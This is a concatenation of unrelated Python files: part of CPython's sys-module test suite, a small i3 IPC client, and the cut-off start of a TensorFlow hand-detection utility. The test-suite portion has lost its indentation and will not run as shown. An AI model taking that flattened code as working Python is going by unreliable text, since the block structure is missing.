# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize",
"dont_write_bytecode", "no_user_site", "no_site",
"ignore_environment", "verbose", "bytes_warning", "quiet",
"hash_randomization", "isolated", "dev_mode", "utf8_mode",
"warn_default_encoding")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
arg = sys_attr
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type(arg)
with self.assertRaises(TypeError):
attr_type.__new__(attr_type, arg)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(os_helper.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % os_helper.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
        # these values have no effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
code = """if 1:
import struct, sys
class C:
def __init__(self):
self.pack = struct.pack
def __del__(self):
self.pack('I', -42)
sys.x = C()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(rc, 0)
self.assertEqual(stdout.rstrip(), b"")
self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
def test_orig_argv(self):
code = textwrap.dedent('''
import sys
print(sys.argv)
print(sys.orig_argv)
''')
args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg']
proc = subprocess.run(args, check=True, capture_output=True, text=True)
expected = [
repr(['-c', 'arg']), # sys.argv
repr(args), # sys.orig_argv
]
self.assertEqual(proc.stdout.rstrip().splitlines(), expected,
proc)
def test_module_names(self):
self.assertIsInstance(sys.stdlib_module_names, frozenset)
for name in sys.stdlib_module_names:
self.assertIsInstance(name, str)
def test_stdlib_dir(self):
os = import_helper.import_fresh_module('os')
marker = getattr(os, '__file__', None)
if marker and not os.path.exists(marker):
marker = None
expected = os.path.dirname(marker) if marker else None
actual = sys._stdlib_dir
self.assertEqual(actual, expected)
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_exception_qualname(self):
# See bpo-41031, bpo-45083.
# Check that the exception is printed with its qualified name
# rather than just classname, and the module names appears
# unless it is one of the hard-coded exclusions.
class A:
class B:
class X(Exception):
pass
for moduleName in 'builtins', '__main__', 'some_module':
with self.subTest(moduleName=moduleName):
A.B.X.__module__ = moduleName
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
expected = self.write_unraisable_exc(
A.B.X(), "msg", "obj");
report = stderr.getvalue()
self.assertIn(A.B.X.__qualname__, report)
if moduleName in ['builtins', '__main__']:
self.assertNotIn(moduleName + '.', report)
else:
self.assertIn(moduleName + '.', report)
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testinternalcapi
self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
x = inspect.currentframe()
check(x, size('3Pi3c'))
# function
def func(): pass
check(func, size('14Pi'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('P2PPP4P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(list(sample), vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('5Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn11PIPP'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'4P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'5P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + 5*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 5*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + 10*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 10*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_changing_sys_stderr_and_removing_reference(self):
# If the default displayhook doesn't take a strong reference
# to sys.stderr the following code can crash. See bpo-43660
# for more details.
code = textwrap.dedent('''
import sys
class MyStderr:
def write(self, s):
sys.stderr = None
sys.stderr = MyStderr()
1/0
''')
rc, out, err = assert_python_failure('-c', code)
self.assertEqual(out, b"")
self.assertEqual(err, b"")
if __name__ == "__main__":
unittest.main()
|
i3msg.py
|
#!/usr/bin/env python
#https://github.com/Ceryn/i3msg-python
import socket, subprocess, struct, json, threading
MSGS = ['RUN_COMMAND', 'GET_WORKSPACES', 'SUBSCRIBE', 'GET_OUTPUTS', 'GET_TREE', 'GET_MARKS', 'GET_BAR_CONFIG', 'GET_VERSION', 'GET_BINDING_MODES', 'GET_CONFIG']
EVENTS = ['workspace', 'output', 'mode', 'window', 'barconfig_update', 'binding', 'shutdown']
for i, v in enumerate(MSGS):
vars()[v] = i
for i, v in enumerate(EVENTS):
vars()[v] = i
i3sockpath = None
def get_i3sockpath():
global i3sockpath
if i3sockpath is None:
i3sockpath = subprocess.check_output(['i3', '--get-socketpath']).strip()
return i3sockpath
def encode(n, msg=''):
return b"".join([str.encode('i3-ipc'),
struct.pack('I', len(msg)),
struct.pack('I', n),
str.encode(msg)])
def decode(blob):
size = int(struct.unpack('I', blob[ 6:10])[0])
type = int(struct.unpack('I', blob[10:14])[0]) & 0x7fffffff
return size, type, blob[14:]
def recvall(s):
size, event, data = decode(s.recv(14))
while len(data) < size:
data += s.recv(size - len(data))
return event, data
def send(n, msg=''):
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.connect(get_i3sockpath())
s.send(encode(n, str(msg)))
_, data = recvall(s)
s.close()
return json.loads(data)
def handle_subscription(s, handler):
while True:
event, data = recvall(s)
handler(event, json.loads(data))
def subscribe(events, handler):
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.connect(get_i3sockpath())
s.send(encode(SUBSCRIBE, json.dumps(events)))
_, data = recvall(s)
data = json.loads(data)
    if data.get('success') is not True:
raise Exception('Subscription failed, got data: %s' % data)
t = threading.Thread(target=handle_subscription, args=(s, handler))
t.daemon = True
t.start()
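# Illustrative usage sketch (not part of the original module). It assumes a
# running i3 session reachable through `i3 --get-socketpath`; the handler and
# the event name below are only examples.
def _example_usage():
    # Synchronous request/reply: fetch the current workspaces.
    workspaces = send(GET_WORKSPACES)
    print([ws['name'] for ws in workspaces])

    # Asynchronous events: the handler runs on a daemon thread started by subscribe().
    def on_event(event, payload):
        print('event %d: %s' % (event, payload.get('change')))

    subscribe(['workspace'], on_event)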
|
test_mt_utils.py
|
# Utilities for object detector.
import numpy as np
import sys
import tensorflow as tf
import os
from threading import Thread
from datetime import datetime
import cv2
detection_graph = tf.Graph()
sys.path.append("..")
# score threshold for showing bounding boxes.
_score_thresh = 0.27
MODEL_NAME = 'hand_inference_graph'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'
